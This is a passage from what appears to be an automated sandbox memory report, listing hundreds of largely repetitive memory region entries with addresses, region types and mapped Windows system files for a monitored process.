1078 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 1079 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 1080 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 1081 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 1082 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 1083 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 1084 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 1085 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 1086 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 1087 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 1088 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 1089 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 1090 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 1091 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 1092 start_va = 0x36e0000 end_va = 0x36effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036e0000" filename = "" Region: id = 1093 start_va = 0x36e0000 end_va = 0x36f3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036e0000" filename = "" Region: id = 1094 start_va = 0x3700000 end_va = 0x370dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003700000" filename = "" Region: id = 1095 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 1096 start_va = 0x36e0000 end_va = 0x36effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036e0000" filename = "" Region: id = 1097 start_va = 0x36e0000 end_va = 0x36f1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036e0000" filename = "" Region: id = 1098 start_va = 0x3700000 end_va = 0x370dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003700000" filename = "" Region: id = 1099 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 1100 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 1101 start_va = 0x3be0000 end_va = 0x3c9ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1102 start_va = 0x7fefcc40000 end_va = 0x7fefcc49fff monitored = 0 entry_point = 0x7fefcc43cb8 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 1103 start_va = 0x7fefcfe0000 end_va = 0x7fefd034fff monitored = 0 entry_point = 0x7fefcfe1054 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1104 start_va = 0x8430000 end_va = 0x84fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008430000" filename = "" Region: id = 1105 start_va = 0x7fefc9e0000 end_va = 0x7fefc9e6fff monitored = 0 entry_point = 0x7fefc9e14b0 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 1106 start_va = 0x7fefcfd0000 end_va = 0x7fefcfd6fff monitored = 0 entry_point = 0x7fefcfd142c region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 1107 start_va = 0x7fef4f90000 end_va = 0x7fef4f97fff monitored = 0 entry_point = 0x7fef4f91414 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1108 start_va = 0x7fef9150000 end_va = 0x7fef91a2fff monitored = 0 entry_point = 0x7fef9152b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 1109 start_va = 0x36e0000 end_va = 0x36edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036e0000" filename = "" Region: id = 1110 start_va = 0x8500000 end_va = 0x860ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 1111 start_va = 0x36e0000 end_va = 0x36e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036e0000" filename = "" Region: id = 1112 start_va = 0x8610000 end_va = 0x8709fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008610000" filename = "" Region: id = 1187 start_va = 0x7080000 end_va = 0x733dfff monitored = 0 entry_point = 0x70ab790 region_type = mapped_file name = "explorer.exe" filename = "\\Windows\\explorer.exe" (normalized: "c:\\windows\\explorer.exe") Region: id = 1188 start_va = 0x66b0000 end_va = 0x672ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000066b0000" filename = "" Region: id = 1189 start_va = 0x7feff160000 end_va = 0x7feff176fff monitored = 0 entry_point = 0x7feff161070 region_type = mapped_file name = "imagehlp.dll" filename = "\\Windows\\System32\\imagehlp.dll" (normalized: "c:\\windows\\system32\\imagehlp.dll") Region: id = 1190 start_va = 0x7fffff74000 end_va = 0x7fffff75fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff74000" filename = "" Region: id = 1191 start_va = 0x6150000 end_va = 0x625ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006150000" filename = "" Region: id = 1192 start_va = 0x7080000 end_va = 0x733dfff monitored = 0 entry_point = 0x70ab790 region_type = mapped_file name = "explorer.exe" filename = "\\Windows\\explorer.exe" (normalized: "c:\\windows\\explorer.exe") Region: id = 1569 start_va = 0x2580000 end_va = 0x258ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 1570 start_va = 0x2580000 end_va = 0x2591fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 1571 start_va = 0x2600000 end_va = 0x260dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002600000" filename = "" Region: id = 1572 start_va = 0x2580000 end_va = 0x258dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002580000" filename = "" Region: id = 1591 start_va = 0x2580000 end_va = 0x258ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 1592 start_va = 0x2580000 end_va = 0x2591fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 1593 start_va = 0x2600000 end_va = 0x260dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002600000" filename = "" Region: id = 1594 start_va = 0x2580000 end_va = 0x258dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002580000" filename = "" Region: id = 1595 start_va = 0x2580000 end_va = 0x258dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002580000" filename = "" Region: id = 1596 start_va = 0x2580000 end_va = 0x2580fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 1597 start_va = 0x7080000 end_va = 0x7179fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007080000" filename = "" Region: id = 1598 start_va = 0x2580000 end_va = 0x258ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 1599 start_va = 0x2580000 end_va = 0x2591fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 1600 start_va = 0x2600000 end_va = 0x260dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002600000" filename = "" Region: id = 1601 start_va = 0x2580000 end_va = 0x258dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002580000" filename = "" Region: id = 1602 start_va = 0x2580000 end_va = 0x258dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002580000" filename = "" Region: id = 1603 start_va = 0x2580000 end_va = 0x258ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 1604 start_va = 0x2580000 end_va = 0x2591fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 1605 start_va = 0x2600000 end_va = 0x260dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002600000" filename = "" Region: id = 1606 start_va = 0x2580000 end_va = 0x258dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002580000" filename = "" Region: id = 1701 start_va = 0x2580000 end_va = 0x2584fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002580000" filename = "" Region: id = 1703 start_va = 0x2750000 end_va = 0x2765fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002750000" filename = "" Region: id = 1704 start_va = 0x39c0000 end_va = 0x3a3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000039c0000" filename = "" Region: id = 1705 start_va = 0x7fffff88000 end_va = 0x7fffff89fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff88000" filename = "" Region: id = 1706 start_va = 0x6670000 end_va = 0x675ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006670000" filename = "" Region: id = 1707 start_va = 0x2590000 end_va = 0x259ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002590000" filename = "" Region: id = 1708 start_va = 0x6160000 end_va = 0x61dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006160000" filename = "" Region: id = 1709 start_va = 0x61e0000 end_va = 0x625ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000061e0000" filename = "" Region: id = 1710 start_va = 0x7110000 end_va = 0x718ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007110000" filename = "" Region: id = 1711 start_va = 0x7fffff80000 end_va = 0x7fffff81fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff80000" filename = "" Region: id = 1712 start_va = 0x7fffff86000 end_va = 0x7fffff87fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff86000" filename = "" Region: id = 1713 start_va = 0x2940000 end_va = 0x2951fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002940000" filename = "" Region: id = 1714 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1715 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1716 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1717 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1718 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1719 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1720 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1721 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1722 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1723 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1724 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1725 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1726 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1727 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1728 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1729 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1730 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1731 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1732 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1733 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1734 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1735 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1736 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1737 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1738 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1739 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1740 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1741 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1742 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1743 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1744 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1745 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1746 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1747 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1748 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1749 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1750 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1751 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1752 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1753 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1754 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1755 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1756 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1757 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1758 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1759 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1760 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1761 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1762 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1763 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1764 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1765 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1766 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1767 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1768 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1769 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1770 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1771 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1772 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1773 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1774 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1775 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1776 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1777 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1778 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1779 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1780 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1781 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1782 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1783 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1784 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1785 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1786 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1787 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1788 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1789 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1790 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1791 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1792 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1793 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1794 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1795 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1796 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1797 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1798 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1799 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1800 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1801 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1802 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1803 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1804 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1805 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1806 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1807 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1808 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1809 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1810 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1811 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1812 start_va = 0x2590000 end_va = 0x259ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002590000" filename = "" Region: id = 1813 start_va = 0x2600000 end_va = 0x260dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002600000" filename = "" Region: id = 1814 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1815 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1816 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1817 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1818 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1819 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1820 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1821 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 1822 start_va = 0x2590000 end_va = 0x259dfff monitored = 1 